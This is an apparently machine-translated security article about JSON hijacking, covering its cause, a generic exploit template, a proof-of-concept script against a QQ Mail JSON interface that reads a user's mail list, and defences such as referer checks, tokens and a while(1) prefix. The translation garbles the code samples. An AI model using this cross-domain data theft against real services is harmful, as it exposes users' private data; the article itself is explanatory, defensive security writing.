Json hijacking/Json hijacking Vulnerability

Source: Internet
Author: User
Tags qmail

0x00Background
JSON (JavaScript Object Notation) is a lightweight data exchange format. Easy to read and write. It is also easy to parse and generate machines. It is based on a subset of JavaScript Programming Language, Standard ECMA-262 3rd Edition-December 1999. JSON uses a completely language-independent text format, but it also uses a habit similar to the C language family (including C, C ++, C #, Java, JavaScript, Perl, Python, and so on ). These features make JSON an ideal data exchange language.
This text-only data interaction method can be used in browsers, so with the development of ajax and web services, it has been widely developed and used by various large websites, including Yahoo, google, Tencent, Baidu, etc.
However, if this interaction method is used to transmit sensitive data and there is not much security control during transmission, it will lead to a security vulnerability, different sensitive information may cause different levels of attacks to the application.
0x01Cause
JSON is a practical application of javascript. as an effective method of data transmission, you must consider the impact of the cross-domain security policy of javascript in the browser. Generally, for example, to transmit the following data
$ Data = array ("username" => "wooyun ",
"Password" => "wooyun"
); There are two data transmission methods in the actual application of JSON:
Xmlhttp:
{& Quot; username & quot;: & quot; wooyun & quot;, & quot; password & quot;: & quot; wooyun & quot;} when obtaining data from the front-end, because the data purchaser and the data provider belong to the same domain such as www.wooyun.org, belong to the same trusted security region. Therefore, you can use xmlhttp to obtain data, and then use xmlhttp to import the data to your own js logic, such as eval (you can also use other methods ), in this way, data can be transmitted only in a trusted domain, without (in the current browser environment) causing data leakage to untrusted third parties.
Script data acquisition method:
Userinfo = {"username": "wooyun", "password": "wooyun"} if the transmitted data is in two different domains, for example, for a large Internet company, when domain name A of application A wants to obtain data that represents the domain name B of application B, because data cannot be obtained across regions in javascript, the script tag is generally used to obtain data, call back to obtain the final data. For example, you can use
<Script src = "http://www.wooyun.org/userdata.php? Callback = userinfo "> </script> because data is transmitted in two completely different domains, lack of effective control may lead to data leakage to third-party programs.
0x02Attack methods and hazards
By analyzing data interactions in applications, we can often find sensitive information leaks. The common methods include capturing application interactions and viewing sensitive data. If there is no security control during transmission, such vulnerabilities can be discovered.
The main danger is that some data-sensitive applications may cause serious attacks. For apps that are not sensitive to data or even published by third parties, such problems are basically not considered as security issues, by using javascript hijacking in the third-party domain, we can steal sensitive data. The general exploit code format is as follows:
<Script>
Function wooyun_callback (){
Alert ();
}
</Script>
<Script src = "http://www.wooyun.org/userdata.php? Callback = wooyun_callback "> </script>0x03Actual Case
By constructing a URL for users to access, you can obtain the QQ Mail list. This vulnerability requires sharing the email information in QQ Mail in web QQ, so QQ Mail opens a json interface to provide a third-party domain name to obtain QQ Mail information, however, this interface lacks sufficient authentication, so any third-party domain can obtain the mail list by using a script.
<Script>
Var Qmail = {};
</Script>
<Script src = "http://mail.qq.com/cgi-bin/login? Fun = passport & target = MLIST & t = login. js & pagesize = 10 & resp_charset = gb2312 & 1 = 3 "> </script>
<Script>
Alert (Qmail. newMailsList. nextUrl );
Alert (document. scripts [1]. src = Qmail. newMailsList. nextUrl );
Alert (Qmail. newMailsList. summary );
</Script>0x04Solution
Avoid cross-Origin data transmission as much as possible. For data transmission in the same domain, xmlhttp is used as the data acquisition method, relying on the Security of javascript in the browser domain to protect data. For cross-Origin data transmission, you must authenticate access to sensitive data. The specific methods include:
1. source restrictions of referer: Use the non-counterfeit nature of the front-end referer to ensure that the application of request data comes from a trusted place. This method is relatively weak and relies entirely on referer, in some cases (such as xss), it may be bypassed.
2 token addition, strictly speaking, this method of using javascript hijacking to obtain data is a CSRF type. However, compared with the traditional CSRF, data cannot be obtained but can only be submitted, this method uses javascript to obtain some sensitive information. If we can make attackers unknown interfaces, we can implement json
Hijacking's defense. Use token to authenticate the identity of the caller. This method requires a finer degree of attention to the identity of the caller. However, in the event of xss, the front-end Token may be leaked, leading to invalid protection.
3
When using json in the same domain, you can add while (1) to the data output header to avoid data being referenced by the script tag, this prevents data leakage in Some browsers with special features.0x05Other security questions
1 json correct http header output
0x06Related Resources
Http://www.json.org/json-zh.html
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.